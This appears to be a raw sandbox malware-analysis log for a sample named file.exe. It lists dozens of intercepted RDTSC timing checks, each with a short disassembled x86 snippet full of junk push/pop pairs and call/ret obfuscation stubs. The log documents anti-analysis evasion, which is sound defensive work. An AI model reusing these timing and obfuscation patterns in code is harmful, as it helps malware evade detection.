                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69CD second address: CD6A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bl, 2Dh 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F7980D061B8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov dword ptr [ebp+12454468h], eax 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F7980D061B8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a movsx ebx, di 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F7980D061C3h 0x00000057 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5C26 second address: CD5C41 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7981407BECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F7981407BE8h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6A3E second address: CD6A4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5C41 second address: CD5C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B9C second address: CD6BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7980D061B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7B0F second address: CD7B15 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9A58 second address: CD9A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA962 second address: CDA968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9C59 second address: CD9C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9C5F second address: CD9CB7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7981407BF8h 0x00000008 jmp 00007F7981407BF2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 sub dword ptr [ebp+122D19CAh], ebx 0x00000018 add dword ptr [ebp+12460966h], edx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov ebx, dword ptr [ebp+122D34F8h] 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov eax, dword ptr [ebp+122D008Dh] 0x00000038 push esi 0x00000039 jns 00007F7981407BE9h 0x0000003f pop ebx 0x00000040 push FFFFFFFFh 0x00000042 nop 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9CB7 second address: CD9CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9CBB second address: CD9CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jng 00007F7981407BF4h 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F7981407BE6h 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE884 second address: CDE88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCADD second address: CDCBA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jno 00007F7981407BE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+12458E12h], ecx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F7981407BE8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+1246FAC9h], edx 0x00000045 jbe 00007F7981407BECh 0x0000004b mov ebx, dword ptr [ebp+122D25E9h] 0x00000051 mov eax, dword ptr [ebp+122D082Dh] 0x00000057 mov dword ptr [ebp+1247A290h], ecx 0x0000005d push FFFFFFFFh 0x0000005f push 00000000h 0x00000061 push eax 0x00000062 call 00007F7981407BE8h 0x00000067 pop eax 0x00000068 mov dword ptr [esp+04h], eax 0x0000006c add dword ptr [esp+04h], 00000017h 0x00000074 inc eax 0x00000075 push eax 0x00000076 ret 0x00000077 pop eax 0x00000078 ret 0x00000079 xor bx, 32E8h 0x0000007e nop 0x0000007f push edi 0x00000080 jg 00007F7981407BFDh 0x00000086 pop edi 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007F7981407BF7h 0x0000008f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEA27 second address: CDEAB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+12471587h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F7980D061B8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 sbb ebx, 1CF40664h 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e xor di, 08DBh 0x00000043 add bx, 077Fh 0x00000048 mov eax, dword ptr [ebp+122D07E5h] 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F7980D061B8h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 0000001Dh 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 mov edi, dword ptr [ebp+122D2732h] 0x0000006e push FFFFFFFFh 0x00000070 stc 0x00000071 nop 0x00000072 pushad 0x00000073 push ebx 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEAB2 second address: CDEABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F7981407BE6h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDB80 second address: CDDB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEABF second address: CDEAC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDB84 second address: CDDB88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7FB5D second address: C7FB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDAAD2 second address: CDAB89 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7980D061C5h 0x00000008 jmp 00007F7980D061BFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 and bl, 00000079h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F7980D061B8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 jnp 00007F7980D061BCh 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov di, A4E1h 0x00000047 movsx ebx, dx 0x0000004a mov eax, dword ptr [ebp+122D0EA1h] 0x00000050 pushad 0x00000051 sub al, 00000072h 0x00000054 mov dword ptr [ebp+122D1895h], edi 0x0000005a popad 0x0000005b push FFFFFFFFh 0x0000005d push 00000000h 0x0000005f push eax 0x00000060 call 00007F7980D061B8h 0x00000065 pop eax 0x00000066 mov dword ptr [esp+04h], eax 0x0000006a add dword ptr [esp+04h], 0000001Dh 0x00000072 inc eax 0x00000073 push eax 0x00000074 ret 0x00000075 pop eax 0x00000076 ret 0x00000077 and di, 9CE7h 0x0000007c or ebx, 046D351Ch 0x00000082 mov bx, 6747h 0x00000086 push eax 0x00000087 pushad 0x00000088 jp 00007F7980D061BCh 0x0000008e push ebx 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDB88 second address: CDDB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F7981407BECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFAA4 second address: CDFAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7FB62 second address: C7FB9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnp 00007F7981407BE6h 0x00000011 jl 00007F7981407BE6h 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F7981407BECh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDB99 second address: CDDB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFAA8 second address: CDFAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFAB5 second address: CDFAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2DCC second address: CE2DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7981407BE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFAB9 second address: CDFABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2DD7 second address: CE2E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F7981407BF5h 0x0000000f add bl, 00000023h 0x00000012 push 00000000h 0x00000014 mov di, 5653h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F7981407BE8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 add edi, 63AE0EE6h 0x0000003a push edi 0x0000003b and edi, dword ptr [ebp+122D2568h] 0x00000041 pop ebx 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F7981407BF8h 0x0000004c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2E4C second address: CE2E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2E52 second address: CE2E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7981407BF4h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2FA1 second address: CE2FA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2FA6 second address: CE2FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2FAC second address: CE3013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push dword ptr fs:[00000000h] 0x0000000f sub di, 0CD7h 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b jmp 00007F7980D061C1h 0x00000020 pushad 0x00000021 cmc 0x00000022 mov dword ptr [ebp+1244E718h], ecx 0x00000028 popad 0x00000029 mov eax, dword ptr [ebp+122D1645h] 0x0000002f mov edi, 47EC4B69h 0x00000034 push FFFFFFFFh 0x00000036 nop 0x00000037 jl 00007F7980D061CEh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3013 second address: CE3022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7981407BEAh 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5F46 second address: CE5F53 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7980D061B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEAB1B second address: CEAB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7981407BE6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91C6D second address: C91C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7980D061B6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F7980D061C9h 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED172 second address: CED178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF250C second address: CF253C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F7980D061BCh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF253C second address: CF2542 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF60A9 second address: CF60AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF60AF second address: CF60B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF60B3 second address: CF60D2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7980D061B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7980D061BCh 0x00000010 jng 00007F7980D061B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF60D2 second address: CF60FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F7981407BF5h 0x0000000f pop eax 0x00000010 jc 00007F7981407BF2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF60FA second address: CF6104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7980D061B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6514 second address: CF651C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF66A0 second address: CF66B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF66B5 second address: CF66BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF66BB second address: CF66BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF697F second address: CF69B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF9h 0x00000007 jmp 00007F7981407BF3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 je 00007F7981407BE6h 0x00000017 popad 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF69B9 second address: CF69C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF69C1 second address: CF69C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF69C5 second address: CF69D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF69D4 second address: CF69D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF69D8 second address: CF6A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BEh 0x00000007 jng 00007F7980D061B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F7980D061CBh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD7FD second address: CFD805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC4B1 second address: CFC4CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC4CD second address: CFC4EE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7981407BF9h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC4EE second address: CFC4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC4F2 second address: CFC501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC501 second address: CFC521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7980D061C9h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC521 second address: CFC530 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7981407BE8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC6A1 second address: CFC6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7980D061C8h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC7E6 second address: CFC7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCBF2 second address: CFCBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCBF7 second address: CFCC13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7981407BF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCC13 second address: CFCC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC152 second address: CFC165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC165 second address: CFC1A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F7980D061B6h 0x00000009 jmp 00007F7980D061C1h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F7980D061BCh 0x00000019 jmp 00007F7980D061C7h 0x0000001e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC1A7 second address: CFC1AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC1AD second address: CFC1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC1B3 second address: CFC1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCF0F second address: CFCF20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7980D061B6h 0x00000009 js 00007F7980D061B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD49E second address: CFD4A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD4A7 second address: CFD4B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F7980D061B6h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0192A second address: D01930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD04A3 second address: CD04B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e je 00007F7980D061BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
